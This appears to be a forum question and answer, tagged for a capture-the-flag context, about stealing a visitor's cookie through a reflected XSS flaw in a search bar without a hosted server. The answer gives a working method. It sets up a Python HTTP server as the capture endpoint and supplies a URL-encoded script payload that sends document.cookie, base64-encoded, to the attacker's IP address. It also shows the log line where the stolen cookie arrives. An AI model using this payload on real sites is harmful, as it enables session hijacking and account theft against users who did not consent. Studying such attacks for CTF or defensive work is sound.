xssctf

XSS Attack without Web Hosting


I am learning about XSS attacks.

Suppose I have a website (let's call it http://www.animallover.com) which allows me to enter anything into a search bar to search for animal names. The website is vulnerable, as entering <script>alert(1)</script> into the search bar triggers an alert.

My goal is to steal the user's cookie by asking the user to visit http://www.animallover.com.

I don't have a web server to host my cookie-capture script.

What should I do?


Solution

  • You can set up an HTTP server on your own computer quite easily.

    For example, Python 3 supports the following one-liner HTTP server:

    python -m http.server 8000
    

    This will respond to HTTP requests arriving at port 8000 on your system. Bear in mind that you might need to adjust your firewall and set up port forwarding on your router to allow traffic through to this port. And make sure you enter this command inside an empty folder, as everything inside it will be published on the internet.

    All incoming requests will be logged on the command line terminal. So if you're trying to fetch an admin's cookie value, you could create a link like this (I'm assuming here that your IP address is 12.34.56.78; you can get the correct value from Google):

    http://example.com/search?q=%3Cscript%3Elocation.href%3D%27http%3A%2F%2F12.34.56.78%3A8000%2F%3F%27%2Bbtoa%28document.cookie%29%3B%3C%2Fscript%3E
    

    This will run the following script on the target server:

    <script>location.href='http://12.34.56.78:8000/?'+btoa(document.cookie);</script>
    

    The cookie value will be base64 encoded, so you'll need to decode that when it arrives. The log output will look something like this:

    $ python -m http.server 8000
    99.99.99.99 - - [01/Jan/2021 01:23:45] "GET /?dXNlcj1hZG1pbjsgc2Vzc2lvbl9pZD0xMjM0NTY3OAo= HTTP/1.1" 200 -